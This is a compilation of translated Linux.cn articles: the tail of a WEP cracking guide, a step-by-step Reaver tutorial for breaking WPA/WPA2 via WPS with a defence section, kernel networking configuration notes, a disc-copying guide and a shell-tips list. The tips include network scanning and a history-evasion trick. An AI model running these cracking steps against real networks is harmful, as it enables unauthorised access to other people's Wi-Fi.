aircrack-ng -b (bssid) (filename-01.cap)

这里的filename就是你在上面输入的文件名。你可以在自己的Home目录下看到。他应该是一个.cap后缀名的文件。

如果你没有足够的数据，破解可能失败，aircrack会告诉你获得更多的数据后重新尝试。如果成功了，你会看到如图结果：

WEP密钥会接着显示“KEY FOUND”。去掉引号，然后输入他就可以登录到目标网络了。

这个过程中的问题

通过这篇文章，我们可以证明想要破解WEP加密的网络对于任何一个具有硬件和软件人来说是如此简单的过程。我一直认为是这样的，但是不像下面视频里的伙计，这个过程中我遇到了很多的问题。实际上，你应该可以注意到最后一张截图和其他的不一样，因为它不是我的截图。虽然我破解的AP是我自己的AP，和我的Alfa在同一间屋子里，而且读取的信号强度一直在-30左右，但是数据的收集速度依然很缓慢，而在数据收集完成以前，BackTrack不能破解他。在尝试了各种方案（在我的MAC和PC上），我始终没能抓取到足够的数据量来破解密钥。

所以，这个过程在理论上是很简单的，实际上因为设备、到AP的距离却又因人而异.

可以去Youtube上看看视频，感受下这个伙计的实际操作。

http://www.youtube.com/embed/kDD9PjiQ2_U?wmode=transparent&rel=0&autohide=1&showinfo=0&enablejsapi=1

感受到一点使用BackTrack破解WEP加密的作用了么？你想说些什么呢？赶快换掉它吧。

via: http://lifehacker.com/5305094/how-to-crack-a-wi+fi-networks-wep-password-with-backtrack

译者：stduolc 校对：wxy

本文由 LCTT 原创翻译，Linux中国 荣誉推出

来源：https://linux.cn/article-2382-1.html

Wi-Fi网络能够让我们便利地访问因特网，但同时，我们又不希望隔壁抠门猥琐男总是蹭我们的网，所以自然要给WiFi加个密码，对吧？于是，好消息是，也许你已经看过我的另一篇文章，“如何使用BackTrack破解WIFI无线网络的WEP密钥”，所以你使用了更稳固的WPA安全协议。

但坏消息是，现在有一款自由开源新工具——Reaver，已经挖掘出了无线路由器的一个漏洞，由此能够破解绝大多数路由器上的密码。今天，我就来一步步介绍，如何使用Reaver破解WPA/WPA2密码。最后我会给出相应的防范对策。

文章的第一部分，是使用Reaver破解WPA的详细步骤，读者可以看视频，也可以跟着下面的文字一起做。然后，我会解释Reaver的工作原理。最后，介绍如何防范Reaver攻击。

http://www.youtube.com/embed/z1c1OIMbmb0?wmode=transparent&rel=0&autohide=1&showinfo=0&enablejsapi=1

在正式开始之前，我还是要不厌其烦强调一下：知识就是力量，但是拥有力量不代表着可以为所欲为、触犯法律。同样，骑白马的不一定是王子，会开锁的也不一定是小偷。本文只是关于某些技术的实验与验证，只适用于学习。你知道的越多，就能够越好的保护自己。

准备工作

首先，无需成为一名网络专家，学会使用复杂的命令行工具，你只需要准备一张空白DVD、一台能连接WiFi的电脑，并腾出几个小时时间，这就是我们基本需要的东西。要安装Reaver，可以有很多方法，但是这里我们建议你按照下面的指南来做：

• The BackTrack 5 Live DVD。BackTrack是一款支持自启动的Linux发行版，上面集成了大量的网络测试工具。虽然这对于安装、配置Reaver并不是必需的一个条件，但是对于大多数用户却是最简单一个方法。从BackTrack的下载页面（传送门）下载Live DVD，然后刻盘。这里你也可以下载镜像然后使用VMware安装，如果你不知道VMware是啥，额，那就还是刻盘吧。如图所示，下载的时候，下拉菜单选择BackTrack 5 R3版本、Gnome环境、根据你的CPU选择32或64位系统（如果这里不确定是32还是64，为了保险起见，请选择32位），下载类型选择ISO，然后就可以点击下载了。

• 配有DVD光驱、支持WiFi的电脑。BackTrack支持大多数的笔记本无线网卡，这一点对于大多数读者应该没什么问题。同时，你的电脑需要有一个DVD光驱，这样才能从BackTrack光盘启动。我的测试环境是一台用了6年的MacBook Pro。

• 附近要有采用WPA加密的WiFi网络。没WiFi网，你破解谁去 =。= ……一会我会在“Reaver的工作原理部分”介绍，WiFi防护设置是如何产生安全漏洞、WPA破解是如何成为可能的。

• 最后，你还需要一点点的耐心。这是整个实验的最后一步，使用Reaver破解WPA密码并不难，它采用的是暴力破解，因此，你的电脑将会测试大量不同的密码组合，来尝试破解路由器，直到最终找到正确的密码。我测试的时候，Reaver花了大概两个半小时破解了我的WiFi密码。Reaver的主页上介绍，一般这个时间在4到10个小时之间，视具体情况而定。

让我们开始吧

此时，你应该已经把BackTrack的DVD光盘刻录好了，笔记本也应该已经准备就绪。

第1步：启动BackTrack

要启动BackTrack，只需将DVD放入光驱，电脑从光盘启动。（如果不知道如何使用live CD或DVD启动，请自行Google。）启动过程中，BackTrack会让你选择启动模式，选择默认的“BackTrack Text – Default Boot Text Mode”然后回车。

最终BackTrack会来到一个命令行界面，键入startx，回车，BackTrack就会进入它的图形界面。

第2步：安装Reaver

（文章更新：Reaver在R3版中已经预装，如果你安装的是BT5的R3版，这一步骤可以忽略，直接跳到第3步。）

Reaver已经加入了BackTrack的最新版软件包，只是还没有集成到live DVD里，所以，在本文最初撰写的时候，你还需要手动安装Reaver。要安装Reaver，首先设置电脑联网。

1.点击Applications > Internet > Wicd Network Manager 2.选择你的网络并点击Connect，如果需要的话，键入密码，点击OK，然后再次点击Connect。

连上网以后，安装Reaver。点击菜单栏里的终端按钮（或者依次点击 Applications > Accessories > Terminal）。在终端界面，键入以下命令：

apt-get update

更新完成之后，键入：

apt-get install reaver

如果一切顺利，Reaver现在应该已经安装好了。如果你刚才的下载安装操作使用的是WiFi上网，那么在继续下面的操作之前，请先断开网络连接，并假装不知道WiFi密码 =。= 接下来我们要准备破解它~

第3步：搜集设备信息，准备破解

在使用Reaver之前，你需要获取你无线网卡的接口名称、路由的BSSID（BSSID是一个由字母和数字组成的序列，用于作为路由器的唯一标识）、以及确保你的无线网卡处于监控模式。具体参见以下步骤。

找到无线网卡：在终端里，键入：

iwconfig

回车。此时你应该看到无线设备的相关信息。一般，名字叫做wlan0，但如果你的机子不止一个无线网卡，或者使用的是不常见的网络设备，名字可能会有所不同。

将无线网卡设置为监控模式：假设你的无线网卡接口名称为wlan0，执行下列命令，将无线网卡设置为监控模式：

airmon-ng start wlan0

这一命令将会输出监控模式接口的名称，如下图中箭头所示，一般情况下，都叫做mon0。

找到你打算破解的路由器的BSSID：最后，你需要获取路由器的唯一标识，以便Reaver指向要破解的目标。执行以下命令：

airodump-ng wlan0

（注意：如果airodump-ng wlan0命令执行失败，可以尝试对监控接口执行，例如airodump-ng mon0）

此时，你将看到屏幕上列出周围一定范围内的无线网络，如下图所示：

当看到你想要破解的网络时，按下Ctrl+C，停止列表刷新，然后复制该网络的BSSID（图中左侧字母、数字和分号组成的序列）。从ENC这一列可以看出，该网络是WPA或WPA2协议。（如果为WEP协议，可以参考我的前一篇文章——WEP密码破解指南）

现在，手里有了BSSID和监控接口的名称，万事俱备，只欠破解了。

第4步：使用Reaver破解无线网络的WPA密码

在终端中执行下列命令，用你实际获取到的BSSID替换命令中的bssid：

reaver -i moninterface -b bssid -vv

例如，如果你和我一样，监控接口都叫做mon0，并且你要破解的路由器BSSID是8D:AE:9D:65:1F:B2，那么命令应该是下面这个样子：

reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -vv

最后，回车！接下来，就是喝喝茶、发发呆，等待Reaver魔法的发生。Reaver将会通过暴力破解，尝试一系列PIN码，这将会持续一段时间，在我的测试中，Reaver花了2个半小时破解网络，得出正确密码。正如前文中提到过的，Reaver的文档号称这个时间一般在4到10个小时之间，因此根据实际情况不同，这个时间也会有所变化。当Reaver的破解完成时，它看起来是下图中这个样子：

一些要强调的事实：Reaver在我的测试中工作良好，但是并非所有的路由器都能顺利破解（后文会具体介绍）。并且，你要破解的路由器需要有一个相对较强的信号，否则Reaver很难正常工作，可能会出现其他一些意想不到的问题。整个过程中，Reaver可能有时会出现超时、PIN码死循环等问题。一般我都不管它们，只是保持电脑尽量靠近路由器，Reaver最终会自行处理这些问题。

除此以外，你可以在Reaver运行的任意时候按下Ctrl+C中断工作。这样会退出程序，但是Reaver下次启动的时候会自动恢复继续之前的工作，前提是只要你没有关闭或重启电脑（如果你直接在live DVD里运行，关闭之前的工作都会丢失）。

Reaver的工作原理

你已经学会了使用Reaver，现在，让我们简单了解一下Reaver的工作原理。它利用了WiFi保护设置（WiFi Protected Setup – 下文中简称为WPS）的一个弱点，WPS是许多路由器上都有的一个功能，可以为用户提供简单的配置过程，它与设备中硬编码保存的一个PIN码绑定在一起。Reaver利用的就是PIN码的一个缺陷，最终的结果就是，只要有足够的时间，它就能破解WPA或WPA2的密码。

关于这个缺陷的具体细节，参看Sean Gallagher’s excellent post on Ars Technica。

如何防范Reaver攻击

该缺陷存在于WPS的实现过程中，因此，如果能够关闭WPS，WiFi就是安全的（或者，更好的情况是，你的路由器天生就木有这一功能）。但不幸的是，正如Gallagher在Ars的文章中所指出的，即使在路由器设置中人为关掉了WPS，Reaver仍然能够破解其密码。

在一次电话通话中，Craig Heffner说道，很多路由器即使关闭WPS都无法有效防范攻击。他和同事一起测试过，所有的Linksys和Cisco Valet无线路由器都是如此。“在所有的Linksys路由器上，你甚至无法手动关闭WPS，”他说，尽管Web界面中有关闭WPS配置的按钮，但是“它仍然会自动打开，极易受到攻击”。

因此，方法一：失败！。也许你可以亲自尝试把你的路由器WPS关闭，然后测试一下Reaver是否还能成功破解。

你也可以在路由器中设置一下MAC地址过滤（只允许指定的白名单设备连接你的网络），但是有经验的黑客还是能够检测出设备的白名单MAC地址，并使用MAC地址仿冒你的计算机。

方法二：失败！那到底该怎么办？

我的建议是，我曾经在我的路由器上安装了开源路由固件DD-WRT，成功防御了Reaver攻击。因为，DD-WRT天生就是不支持WPS的，因此，这成为了又一个我热爱自由软件的原因。如果你也对DD-WRT感兴趣，可以看一下这里的设备支持列表，看是否支持你的路由器设备。除了安全上的升级，DD-WRT还可以监控网络行为，设置网络驱动器，拦截广告，增强WiFi信号范围等，它完全可以让你60美刀的路由器发挥出600美刀路由器的水平！

via: http://lifehacker.com/5873407/how-to-crack-a-wi+fi-networks-wpa-password-with-reaver

译者：Mr小眼儿 校对：wxy

本文由 LCTT 原创翻译，Linux中国 荣誉推出

来源：https://linux.cn/article-2335-1.html

在本篇中，我们将继续配置网络特性。记住，网络是计算机最重要的特性，这篇文章和这之后的网络相关文章都要重点了解。

在我们开启这系列之前，我先要澄清一些事情。配置进程不会编辑你当前系统的内核。这个进程配置的是你编译(或者交叉编译)新内核前的源代码。一旦我完成了配置过程，那么我会讨论读者建议的话题。同样，作为提醒，每个段落中在引号或者括号中的第一句或者第二句(很少)的文本是配置工具中设置的名字。

首先，我们可以启用两个不同的稀疏型独立协议组播路由协议(“IP: PIM-SM version 1 support” 和 “IP: PIM-SM version 2 support”)，组播有点像广播，但是广播会给所有计算机发送信号而组播只会给选定的组或者计算机发送信号。所有PIM协议都是工作在IP的组播路由协议。

注意：当计算机与另外一台计算机或者服务器通信时，这叫做单播 – 只是以防你们想知道。

下一个要配置的网络特性是”ARP daemon support”。这让内核有一张IP地址表以及它们相应的在内部缓存中的硬件地址。ARP代表的是地址解析协议(Address-Resolution-Protocol)。

为了额外的安全，”TCP syncookie support”应该要启用。这保护计算机免于受到SYN洪水攻击。黑客或者恶意软件可能会发送SYN信息给一台服务器来消耗它的资源，以便让真实的访客无法使用服务器提供的服务。SYN消息会打开一个计算机和服务器之间的连接。Syncookie会阻断不正当的SYN消息。那么，真实的用户可以仍旧访问访问网站，而黑客则没办法浪费你的带宽。服务器应该启用这个特性。

下面的特性是用于 “Virtual (secure) IP: tunneling”。隧道是一个网络协议到另外一个网络协议的封装。当在使用虚拟私人网络(VPN)时需要使用安全隧道。

接下来，启用”AH transformation”增加对IPSec验证头的支持。这是一种管理数据验证的安全措施。

在这之后，启用”ESP transformation”增加对IPSec封装安全协议的支持。这是加密与可选择的数据验证的安全措施。

如果启用了这个特性(IP: IPComp transformation)，Linux内核会支持IP负载压缩协议。这是一种无损压缩系统。无损指的是数据仍会保持完整，在解压缩后，数据在压缩前后没有变化。压缩在加密前先执行。由于更少的数据传输，所以这个压缩协议可以加速网络。

下面三个设置用于处理不同的IPsec特性(“IP: IPsec transport mode”、”IP: IPsec tunnel mode”和”IP: IPsec BEET mode”)。IPSec代表的是因特网安全协议(Internet Protocol SECurity).两台计算机之间并且/或者服务器间的传输模式是默认的IPSec模式。传输模式使用AH或者ESP头并且只加密IP头。在隧道模式下，IP头和负载会被加密。隧道模式通常用于连接网关到服务器/服务器或者服务器到服务器。BEET模式(Bound End-to-End Tunnel)不会在IP地址改变时重连。BEET模式下的连接会仍然存在。BEET模式比其他几种模式使用更少的字节。

下面，内核可以支持收到大量IPv4/TCP包时减轻栈负担(Large Receive Offload (ipv4/tcp))。网卡(NIC)处理TCP/IP栈。这个特性在内核中增加了处理大型栈的代码。

INET套接字可以启用(INET: socket monitoring interface)。INET套接字用于因特网。这个特性(当启用时)会监视来自或者发往因特网的连接与流量。

这里有另外一个套接字监视接口(UDP: socket monitoring interface)。这个用于用户数据报协议(User Datagram Protocol (UDP))。再说一下，这个特性监视UDP的套接字。

以下的设定会启用不同的TCP拥塞控制(TCP: advanced congestion control)。如果网络变得太忙或者带宽已满，那么许多计算机必须等待一些带宽或者它们的数据流会变慢。如果流量被合理管理，这回有助于网络性能提升。

TCP连接可以被MD5保护(TCP: MD5 Signature Option support)。这用于保护核心路由器之间的边界网关协议(Border Gateway Protocol (BGP))连接。核心路由器是网络中主要的路由器；这些路由器有时指的是因特网/网络的骨干。BGP是一种路由决策协议。

下一个设定允许你启用/禁用”The IPv6 protocol”。当你启用它，IPv4仍旧可以很好地工作。

下面的特性是一个特殊的隐私特性(IPv6: Privacy Extensions (RFC 3041) support)。这使得系统在网络接口中生成并使用不同的随即地址。

注意：计算机中没有数据是真正随机的。计算机中随机数和随机字串通常称为伪随机。

在多路由的网络中，这个特性允许系统能够更有效地计算出该使用哪一个(IPv6: Router Preference (RFC 4191))。

在这之后，一个用于处理路由信息的实验性特性可以启用/禁用(IPv6: Route Information (RFC 4191))。记住，在编译一个稳定内核时，除非你确实需要这个问题中特性，才去安装实验性的功能。

有时，当系统自动配置它的IPv6地址时，它可能会得到一个网络中已被使用的IPv6地址。这是一个允许重复地址检测(Duplicate Address Detection (DAD)的实验性特性(IPv6: Enable RFC 4429 Optimistic DAD)。

IPv6可以有不同的IPsecc特性支持(“IPv6: AH transformation” 和 “IPv6: ESP transformation”)。

IPv6同样可以使用先前讨论过的IP负载压缩协议(IP Payload Compression Protocol)(IPv6: IPComp transformation)。

这里甚至有IPv6移动支持(IPv6: Mobility)。这允许使用IPv6的移动设备在保留同样地址的情况下使用其他的网络。

再说一次，这里同样有一些针对IPv6的IPsec特性(“IPv6: IPsec transport mode”、”IPv6: IPsec tunnel mode”、”IPv6: IPsec BEET mode”)。

当启用此项后，IPv6可以支持MIPv6路由优化(IPv6: MIPv6 route optimization mode)。这样就可以确保最短和最佳网络路径了。如果消息在更少的路由和网络设备间发送，那么下载和上传速度就可以更快。

如果一个管理员需要连接到两个IPv6网络，但是只能通过IPv4来连接，这时内核使这个变得可能(IPv6: IPv6-in-IPv4 tunnel (SIT driver)。这通过隧道使IPv6报文穿越IPv4网络。

这个隧道特性是用于IPv6-in-IPv6 和 IPv4 tunneled in IPv6 (IPv6: IP-in-IPv6 tunnel (RFC2473))

另外一个隧道特性是(IPv6: GRE tunnel)。他只允许GRE隧道。(GRE：通用路由封装(Generic Routing Encapsulation))

允许支持多重路由表(IPv6: Multiple Routing Tables)。路由表是一张网络位置列表和数据要去目的地的路径。

允许根据源地址或前缀进行路由如果启用了(IPv6: source address based routing)。

“IPv6 Multicast routing”(IPv6组播路由)仍然是实验性质。IPv4和IPv6处理组播的方式不同。

典型的组播路由根据目标地址和源地址来处理组播包(IPv6: multicast policy routing)。启用这个选项会将接口和包的标记(mark)包含到决策中。

下面可以启用IPv6的PIM-SMv2 组播路由协议(IPv6: PIM-SM version 2 support)。这与先前提到的IPv4 PIM相同。因为IPv4和IPv6不同，所以PIM可以被v4/v6同时/分别激活

网络包标签协议(Network packet labeling protocols)(就像CIPSO和RIPSO)可以启用(NetLabel subsystem support)。这些标签包含了安全信息和权限。

网络包可以通过启用安全标记(Security Marking)变得更安全。

这个网络特性增加了一些开销(Time-stamping in PHY devices)。物理层(PHY)设备可以给网络包打上时间戳。PHY代表的是”PHYsical layer”。这些设备管理收到和发送的消息。

可以启用netfilter(Network packet filtering framework)。Netfilters过滤并修改过往的网络包。包过滤器是一种防火墙。如果包满足了一定的条件，包不会被允许通过。

数据报拥塞控制协议(Datagram Congestion Control Protocol)可以启用(The DCCP Protocol)。DCCP允许双向单播连接。DCCP有助于流媒体、网络电话和在线游戏。

下一步，流控制传输协议(Stream Control Transmission Protocol)可以启用(The SCTP Protocol)。SCTP工作在IP顶层并且是一个稳定可靠的协议。

下面的协议是可靠数据报套接字(Reliable Datagram Sockets)协议(The RDS Protocol)。

RDS可以使用Infiniband和iWARP作为一种支持RDMA的传输方式(RDS over Infiniband and iWARP)，Infiniband和iWARP都是协议。RDMA代表的是远程直接内存访问(remote direct memory access)。RDMA用于一台远程计算机访问另一台计算机的内存而无需本机计算机操作系统的辅助。这就像直接内存访问(DMA),但是这里远程代替了本地计算机。

RDS同样可以使用TCP传输(RDS over TCP)

接下来，”RDS debugging messages”应该禁用。

下面的网络协议用于集群(The TIPC Protocol)。集群就是一组计算机作为一台计算机。它们需要有一个方式去通信，所以他们使用透明内部进程间通信协议(Transparent Inter Process Communication (TIPC))。

这个高速协议使用固定大小的数据包(Asynchronous Transfer Mode (ATM))。

使用ATM的IP可以与连接到一个ATM网络的IP的系统通信(Classical IP over ATM)。

下一个特性禁用”ICMP host unreachable”(ICMP主机不可达)错误信息(Do NOT send ICMP if no neighbor)。这防止了由于重新校验而移除ATMARP表被移除的问题。ATMARP表管理地址解析。ICMP代表的是因特网控制消息协议(Internet Control Message Protocol)并被常用于通过网络发送错误消息。

LAN仿真(LANE)仿真了ATM网络上的LAN服务(LAN Emulation (LANE) support)。一台LANE计算机可以作为桥接Ethernet和ELAN的代理。

“Multi-Protocol Over ATM (MPOA) support”允许ATM设备通过子网边界发送连接。

在这个特性下，至少在kernel看来ATM PVCs的行为就像Ethernet(RFC1483/2684 Bridged protocols）。PVC代表的是永久虚电路(permanent virtual circuit)。虚拟连接是一种基于包的连接，它伴随着主/原始协议使用其他更高层的协议。

“Layer Two Tunneling Protocol (L2TP)”(二层隧道协议)是隧道对应用透明。虚拟私有网络(Virtual Private Networks (VPNs))使用L2TP

要想使用基于Linux的以太网桥，启用这个桥特性(802.1d Ethernet Bridging)。在网络中，一个桥同时连接两个或者更多的连接。以太网桥是使用以太网端口的硬件桥。

“IGMP/MLD snooping”(IGMP/MLD 探听)是一种以太网桥能够基于IGMP/MLD负载选择性地转发组播信号的能力。禁用这个特性能够明显减少内核的大小。IGMP代表的是因特网组管理协议(Internet Group Management Protocol),这是一种被用于设置组播组的协议。MLD代表多播监听发现(Multicast Listener Discovery)。

下一个过滤特性允许以太网桥选择性地管理在每个数据包中的基于VLAN的信息的流量。禁用这个特性可以减小内核的大小。

通过启用这个特性(802.1Q VLAN Support)，VLAN接口可以在以太网上创建。下面”GVRP (GARP VLAN Registration Protocol)”支持GVPR协议被用于在网络设备上注册某些vlan。

在这之后，”MVRP (Multiple VLAN Registration Protocol) support”(多重VLAN注册协议)可以启用。MVRP是GVRP更新的替代品。

“DECnet Support”是一种Digital公司发明的网络协议。这是一中既安全又稳定的协议。

“DECnet router support”允许用户制作基于Linux的支持DRCnet的路由。

注意：Linux可以用于服务器、工作站、路由器、集群、防火墙并支持其他许多用途。

下面的特性用于支持逻辑链路层2(Logical Link Layer type 2)(ANSI/IEEE 802.2 LLC type 2 Support)。这层允许在同一个网络设备上使用多个协议。强烈建议在网络很重要的环境中启用这个特性。最好所有内核都支持这个特性。

在下一篇文章中，我们将讨论更多的关于可以配置的网络设定。

via: http://www.linux.org/threads/the-linux-kernel-configuring-the-kernel-part-8.4525/

译者：geekpi 校对：wxy

本文由 LCTT 原创翻译，Linux中国 荣誉推出

来源：https://linux.cn/article-2386-1.html

Ubuntu是一个功能强大的现代操作系统，可以执行很多任务。你可以使用Ubuntu创建文档，浏览网页，聆听音乐，以及烧录或拷贝媒体光盘。

就像Windows和Max OS X一样，Ubuntu是无所不能的！

这篇简单的手册将告诉你如何使用Ubuntu拷贝，翻录或烧录一张CD/DVD光盘。如果你有一张包含音频文件（音乐）或视频文件（电影）的光盘，并且你想要复制这张光盘（创建多个副本），使用Ubuntu会使你很容易做到。

如果你已经准备好想要拷贝进一张媒体光盘（CD/DVD）的音频或视频文件，Ubuntu也可以处理它。你可以在Ubuntu上安装很多的免费软件用于烧录或翻录一张CD/DVD光盘，但Ubuntu已经安装好一款默认的相关软件。接下来我们会使用这款默认软件去拷贝或翻录CD/DVD光盘。

Brasero光盘烧录机安装在UBuntu的每一个版本上。它是Ubuntu上默认的光盘烧录机。它被设计得足够简单，拥有诸多独特的特性来使得用户能够快速简便地创建光盘。

下面列出来的是Brasero的一些特性：

• 创建数据CD/DVD时自动过滤隐藏和损坏的文件
• 同时支持多个会话，可以执行磁盘文件的完整性检查
• 可以即时烧录视频CD/DVD
• 可以镜像CD/DVD内容到硬盘
• 可以擦除可擦写CD/DVD

还有很多其它的功能。如果你想找一个Ubuntu上简便的磁盘刻录机，在做任何操作前请先看看这个软件。

要开始使用Brasero去烧录CD/DVD光盘，请确保你的电脑安装了CD/DVD烧录机。如果没有，显然你无法烧录。如果你的电脑符合要求，将你想要翻录的数据光盘插入CD/DVD，然后进入Dash，搜索Brasero。

当Brasero打开后，选择磁盘拷贝。这个功能会拷贝一个光盘里的内容，然后将其写入到另一个光盘中。如果这是你想要的，请继续。

如果Ubuntu能够访问你的CD/DVD烧录机，Brasero会打开并自动识别光盘内容。在这里，你可以单击 复制 从源光盘创建一个拷贝。如果你希望创建多个拷贝，单击按钮 创建多个拷贝。

当系统提示安装所需的软件包时，单击 安装。

安装完成后，Brasero会开始拷贝光盘。如果最终光盘完成拷贝，系统会提示你插入一张空白的可写入的CD/DVD光盘以便写入拷贝。插入它然后等待完成将内容写入光盘的操作。

当你完成以上操作时，移除光盘，就可以使用烧录好的光盘了！

via: http://www.liberiangeek.net/2013/12/daily-ubuntu-tips-copy-cd-dvd-discs-using-ubuntu/

译者：KayGuoWhu 校对：wxy

本文由 LCTT 原创翻译，Linux中国 荣誉推出

来源：https://linux.cn/article-2387-1.html

我日常使用Linux shell(Bash)，但是我经常忘记一些有用的命令或者shell技巧。是的，我能记住一些命令，但是肯定不会只在特定的任务上使用一次，所以我就开始在我的Dropbox账号里用文本文件写下这些Linux shell的小技巧，现在我决定共享它给你。这个表我以后还会更新。记住，这里的一些贴士需要在你的Linux发行版上安装额外的软件。

在bash中检查远程端口是否打开:

echo >/dev/tcp/8.8.8.8/53 && echo "open"

将进程挂起:

Ctrl + z

将进程移到前台:

fg

（译注，挂起的进程是不执行的，如果希望在后台执行，可以使用bg命令，并且指定通过jobs命令获得的任务号。）

生成随机16进制数字,n是字符的数量:

openssl rand -hex n

在当前shell中执行一个文件中的命令（译注：这个文件不是一个bash脚本，比如.bashrc、bash_profile等）:

source /home/user/file.name

提取字符串的前5个字符:

${variable:0:5}

打开SSH调试模式（译注：当你遇到SSH连接问题时很有用）:

ssh -vvv user@ip_address

使用pem key的进行SSH连接：

ssh user@ip_address -i key.pem

用wget获取完整目录列表到本地目录:

wget -r --no-parent --reject "index.html*" http://hostname/ -P /home/user/dirs

同时创建多个目录:

mkdir -p /home/user/{test,test1,test2}

以树状列出进程及子进程:

ps axwef

创建war文件:

jar -cvf name.war file

测试磁盘写速度:

dd if=/dev/zero of=/tmp/output.img bs=8k count=256k conv=fdatasync; rm -rf /tmp/output.img

测试磁盘读速度:

hdparm -Tt /dev/sda

获取文本的md5值:

echo -n "text" | md5sum

检测xml语法:

xmllint --noout file.xml

将tar.gz文件解压到指定目录:

tar zxvf package.tar.gz -C new_dir

用curl获取HTTP头:

curl -I http://www.example.com

修改一些文件或目录的时间戳 (格式为：YYMMDDhhmm):

touch -t 0712250000 file

使用wget从ftp下载:

wget -m ftp://username:password@hostname

生成随机密码 (本例中16位字符长):

LANG=c < /dev/urandom tr -dc _A-Z-a-z-0-9 | head -c${1:-16};echo;

快速创建一个文件的备份（扩展名是.bkp）:

cp some_file_name{,.bkp}

访问Windows共享:

smbclient -U "DOMAINuser" //dc.domain.com/share/test/dir

运行history中的命令 (这里在history中的第100个):

!100

unzip到目录中:

unzip package_name.zip -d dir_name

输入多行文字 (按 CTRL + d 退出):

cat > test.txt

创建空白的文件或者清空已存在的文件:

> test.txt

从Ubuntu NTP服务器上更新日期:

ntpdate ntp.ubuntu.com

netstat 显示所有IPv4的TCP监听的端口:

netstat -lnt4 | awk '{print $4}' | cut -f2 -d: | grep -o '[0-9]*'

将qcow2的镜像转化成raw格式:

qemu-img convert -f qcow2 -O raw precise-server-cloudimg-amd64-disk1.img
                                 precise-server-cloudimg-amd64-disk1.raw

重复运行命令并显示它的输出 (默认2秒重复一次):

watch ps -ef

显示所有用户:

getent passwd

以读写模式挂载根文件系统:

mount -o remount,rw /

挂载目录 (适合于符号链接不能工作的情况下):

mount --bind /source /destination

发送DNS动态更新给DNS:

nsupdate <

递归grep所有目录

grep -r "some_text" /path/to/dir

列出10个最大的系统中已打开的文件:

lsof / | awk '{ if($7 > 1048576) print $7/1048576 "MB "$9 }' | sort -n -u | tail

以MB显示空余内存:

free -m | grep cache | awk '/[0-9]/{ print $4" MB" }'

打开vim并跳转到文件最后:

vim + some_file_name

git clone特定branch (本例是master分支):

git clone git@github.com:name/app.git -b master

git切换到另外一个branch (本例是develop分支):

git checkout develop

git删除一个branch(本例是myfeature):

git branch -d myfeature

Git删除一个远程branch:

git push origin :branchName

Git push 新的branch到远程:

git push -u origin mynewfeature

打印history中最后的cat命令

!cat:p

运行history中的最后的cat命令:

!cat

找出在/home/user中的所有空子目录:

find /home/user -maxdepth 1 -type d -empty

得到test.txt中50到60行的文本:

< test.txt sed -n '50,60p'

以sudo权限重新运行上一个执行的命令 (如果是: mkdir /root/test, 下面会运行: sudo mkdir /root/test)（译注：当你执行一个命令忘记sudo时，可以这样重新执行，而不必再把完整命令敲一遍）:

sudo !!

创建临时RAM文件系统 - ramdisk (请先创建 /tmpram 目录):

mount -t tmpfs tmpfs /tmpram -o size=512m

Grep完整的单词（译注：而不是其它单词的一部分）:

grep -w "name" test.txt

提升权限后在一个文件后追加文本:

echo "some text" | sudo tee -a /path/file

列出所有支持的kill信号:

kill -l

生成随机密码 (本例中16个字符长):

openssl rand -base64 16

在bash历史中不记录最后的会话:

kill -9 $$

扫描网络来找出开放的端口:

nmap -p 8081 172.20.0.0/16

设置git email:

git config --global user.email "me@example.com"

如果你有未提交的commit，与master同步:

git pull --rebase origin master

将文件名中含有txt的所有文件移动到/home/user:

find -iname "*txt*" -exec mv -v {} /home/user ;

按行将两个文件中的对应行合并显示:

paste test.txt test1.txt

shell中的进度条:

pv data.log

用netcat发送数据给服务器:

echo "hosts.sampleHost 10 `date +%s`" | nc 192.168.200.2 3000

转换tab为空格:

expand test.txt > test1.txt

跳过bash历史:

<<空格>>cmd

回到之前的工作目录:

cd -

切割大的tar.gz文件为几个文件 (每个100MB)，并还原:

split –b 100m /path/to/large/archive /path/to/output/files
cat files* > archive

用curl获取HTTP状态值:

curl -sL -w "%{http_code}\n" www.example.com -o /dev/null

当 Ctrl + c 没用时:

Ctrl +

获取文件所有者:

stat -c %U file.txt

列出块设备:

lsblk -f

找出文件中带有末尾空格的文件:

find . -type f -exec egrep -l " +$" "{}" ;

找出用tab缩进的文件:

find . -type f -exec egrep -l $'t' "{}" ;

用"="打印水平行

printf '%100sn' | tr ' ' =

更新: 2013年11月25日

via: http://www.techbar.me/linux-shell-tips/

译者：geekpi 校对：wxy

本文由 LCTT 原创翻译，Linux中国 荣誉推出

来源：https://linux.cn/article-2389-1.html

Novell的网络协议IPX通常用于Windows系统和NetWare服务器(The IPX protocol)。IPX代表网间分组交换(Internetwork Packet Exchange)。这是一个网络层协议通常与传输层的SPX协议同时使用。

为了使NetWare服务器在服务的网络中有相同的IPX地址，启用下一个特性(IPX: Full internal IPX network)。不然，每个网络都会看到服务器一个不同的IPX地址。

注意：IPX协议使用IPX寻址，而不是IP寻址。IP地址不是计算机网络中唯一的网络地址。

对于在Apple网络中的Linux系统，需要启用Appletalk(Appletalk protocol support)。苹果计算机和苹果打印机通常使用Appletalk在网络间通信。Appletalk不需要一台中心路由器/服务器并且网络系统是即插即用的。

在Appletalk网络中Linux系统需要使用IP需要”Appletalk interfaces support”(AppleTalk接口支持)。

下一个特性允许用户在Appletalk中使用IP隧道(Appletalk-IP driver support)。

接下来，这个特性允许IP包被封装成Apppletalk帧(IP to Appletalk-IP Encapsulation support)。在网络中，帧是一种标记包的开始和结束的特殊序列位。这个特性会将IP包放在Appletalk包内部。

这个特性允许为先前的特性解包(Appletalk-IP to IP Decapsulation support)。解包器会将IP包从Appletalk包中拿出。

这是另外一个协议层称为”X.25″ (CCITT X.25 Packet Layer)。这个协议层通常用于非常大的网络，就像国家公网。许多银行使用这个在他们的扩展网络系统里。X25(拼成”X25″或”X.25″)网络拥有将进入数据包打包的包分组交换机。X25正在被更简单的IP协议代替。X25是一个不如TCP/IP有效率的旧协议，但是一些公司发现它在大型、复杂的网络中很有用。

LAPB是用于X.25的数据链路层(LAPB Data Link Driver)。如果上面的启用了，那么这也应该同时启用。LAPB代表的是”Link Access Procedure Balanced”(链路访问过程平衡)。LAPB同样也用于以太网和X.21网卡中(这里没有打错)。X.21是用于物理层(硬件),X.25用于网络层。LPAB会检查错误并确保包被放回正确的序列中。

Nokia调制解调器使用的电话网络协议通常称作”PhoNet”(Phonet protocols family)。Linux计算机远程控制Nokia电话机需要这个特性。

